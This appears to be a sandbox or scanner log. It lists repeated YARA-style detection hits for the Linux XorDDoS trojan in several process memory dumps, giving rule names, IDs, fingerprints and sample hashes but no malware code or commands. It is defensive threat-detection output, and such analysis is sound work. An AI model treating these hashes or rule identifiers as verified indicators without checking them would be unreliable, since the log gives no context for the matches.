Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
